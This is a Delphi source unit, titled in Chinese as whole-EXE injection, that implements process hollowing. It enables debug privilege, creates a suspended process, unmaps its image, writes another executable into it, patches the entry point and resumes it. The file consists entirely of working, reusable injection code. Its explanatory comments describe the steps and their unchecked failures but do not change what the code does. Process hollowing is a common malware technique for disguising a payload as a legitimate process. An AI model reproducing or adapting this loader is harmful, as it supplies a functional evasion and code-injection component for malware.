EXE整体注入
intject.pas
unit intject;
interface
uses
Windows;
var
// Resolved at run time from ntdll.dll with GetProcAddress (see InTo); the
// NTSTATUS result is declared as a plain LongInt and is never inspected.
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
// Resolved at run time from kernel32.dll as CreateProcessW (UNICODE) or
// CreateProcessA (see InTo); same signature as the static CreateProcess.
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
// Leftover of the earlier static import; the dynamic lookup above replaces it.
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
// Fixed-size view over the section header table that follows the optional
// header. Only 96 entries are declared; InTo indexes it by
// FileHeader.NumberOfSections without checking that bound.
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
// Unit entry point: reads the file at `path` and runs it inside a new process
// created from the command line `path1` (see implementation).
procedure InJect(path,path1:string);
implementation
// Address of the first IMAGE_SECTION_HEADER: the section table starts right
// after the optional header, and its length is taken from the file header's
// SizeOfOptionalHeader field rather than from SizeOf(TImageOptionalHeader).
// NTHeader: pointer to the NT headers inside a buffered (un-mapped) PE image.
function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
var
  Cursor: PByte;
Begin
  Cursor := PByte(@NTHeader.OptionalHeader);
  Inc(Cursor, NTHeader.FileHeader.SizeOfOptionalHeader);
  Result := PImageSectionHeader(Cursor);
End;
// Maps the three memory-permission bits of a section's Characteristics
// (bits 29..31: execute, read, write) to the matching VirtualProtect page
// protection. A "write without read" combination is treated as read/write.
// Characteristics: IMAGE_SECTION_HEADER.Characteristics of the section.
// Returns: one of the PAGE_* constants.
function Protect(Characteristics: ULONG): ULONG;
var
  Bits: ULONG;
Begin
  Bits := Characteristics shr 29; // 0..7: bit0 = execute, bit1 = read, bit2 = write
  case Bits of
    0: Result := PAGE_NOACCESS;
    1: Result := PAGE_EXECUTE;
    2: Result := PAGE_READONLY;
    3: Result := PAGE_EXECUTE_READ;
    4: Result := PAGE_READWRITE;
    5: Result := PAGE_EXECUTE_READWRITE;
    6: Result := PAGE_READWRITE;
  else
    Result := PAGE_EXECUTE_READWRITE;
  end;
End;
// Tries to enable SeDebugPrivilege on the current process token. Every step
// is best-effort: a failed OpenProcessToken or LookupPrivilegeValue simply
// ends the procedure, and the result of AdjustTokenPrivileges is not checked.
// The token handle is not closed.
procedure SetPrivilege;
var
  Token: THandle;
  Privs: TTokenPrivileges;
  ReturnLen: DWORD;
  PrivLuid: TLargeInteger;
begin
  // Handle to our own access token, opened only for privilege adjustment.
  if not OpenProcessToken(GetCurrentProcess, TOKEN_ADJUST_PRIVILEGES, Token) then
    Exit;
  if not LookupPrivilegeValue(nil, 'SeDebugPrivilege', PrivLuid) then
    Exit;
  Privs.PrivilegeCount := 1;
  Privs.Privileges[0].Luid := PrivLuid;
  Privs.Privileges[0].Attributes := 2; // SE_PRIVILEGE_ENABLED
  ReturnLen := 0;
  AdjustTokenPrivileges(Token, False, Privs, SizeOf(TTokenPrivileges), nil, ReturnLen);
end;
// Creates a suspended process from ProcessName, unmaps its original image and
// writes the PE image held in Buffer in its place, then redirects the main
// thread to the new entry point and resumes it.
// Buffer: raw, un-mapped file bytes of a 32-bit PE image (section data is copied
//   from the PointerToRawData file offsets; no base relocations are applied).
// ProcessName: passed to CreateProcess as lpCommandLine.
// Most API results are not checked. If SetThreadContext fails the new process
// is terminated, otherwise it is resumed. Handles in ProcessInfo are never
// closed. 32-bit only: the context fields used (Eax, Ebx, Seg*) and the
// Cardinal casts assume an x86 target.
// From the outside the observable sequence is CREATE_SUSPENDED,
// ZwUnmapViewOfSection, VirtualAllocEx/WriteProcessMemory into the child,
// SetThreadContext and ResumeThread.
procedure InTo(Buffer: Pointer; ProcessName: String);
Var
ProcessInfo :TProcessInformation;
StartupInfo :TStartupInfo;
Context :TContext;
BaseAddress :Pointer;
BytesRead :DWORD;
BytesWritten :DWORD;
I :ULONG;
OldProtect :ULONG;
NTHeaders :PImageNTHeaders;
Sections :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin
FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo), 0);
StartupInfo.cb := SizeOf(TStartupInfo);
// dwFlags stays 0, so STARTF_USESHOWWINDOW is not set and this value is ignored by CreateProcess.
StartupInfo.wShowWindow := SW_HIDE;
// CreateProcess is looked up by name at run time instead of being linked statically.
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
// Same for ZwUnmapViewOfSection (the static import is commented out in the interface section).
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
SetPrivilege;
// Result not checked; a failed CreateProcess leaves ProcessInfo zeroed and the calls below operate on handle 0.
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
// Only the integer registers of the suspended main thread are fetched.
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
// Relies on the convention that Ebx in the initial context of a new process's
// first thread points at its PEB, whose field at offset 8 is the image base.
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
// Leaves the child suspended with its image already unmapped; nothing is cleaned up.
if not Assigned(Buffer) then exit;
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
// Allocation is requested exactly at the preferred ImageBase; since no
// relocations are processed here, the image must land at that address.
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
// Same early exit as above: child stays suspended without an image.
If not Assigned(BaseAddress) then exit;
// Headers first, then each section's raw data at its VirtualAddress.
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
// NumberOfSections is trusted from the file; the 96-entry array type is not bounds-checked against it.
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
// Page protection is derived from the section's characteristics (see Protect).
VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
Protect(Sections[I].Characteristics),OldProtect);
end;
// Publish the new image base in the same PEB field that was read above.
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
// By the same initial-context convention, Eax is the address the thread starts executing at.
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
// Hard-coded 32-bit user-mode selector values and a constant EFlags; these
// are not taken from the context that was read, so they are overwritten as-is.
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
// Failure to install the modified context is the only error that is acted upon.
if not SetThreadContext(ProcessInfo.hThread, Context) then
TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;
// Reads the whole file at `path` into memory and hands it to InTo together with
// `path1` (the command line of the process to create).
// path: file whose raw bytes become the image written into the new process.
// path1: passed through to InTo as ProcessName.
// Nothing is validated: an INVALID_HANDLE_VALUE from CreateFile, a failed
// GetFileSize or a short ReadFile all flow straight into InTo unnoticed.
procedure InJect(path,path1:string);
var
BytesRead, Module, Size: dword;
Data: pointer;
begin
// Opened read-only with read sharing; result not checked.
Module := CreateFile(pchar(path), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
// Low 32 bits of the size only (high part discarded).
Size := GetFileSize(Module, nil);
GetMem(Data, size);
// BytesRead is not compared with Size.
ReadFile(Module, Data^, size, BytesRead, nil);
InTo(data,path1);
// The file handle is held open for the whole duration of InTo.
CloseHandle(Module);
freemem(data);
end;
end.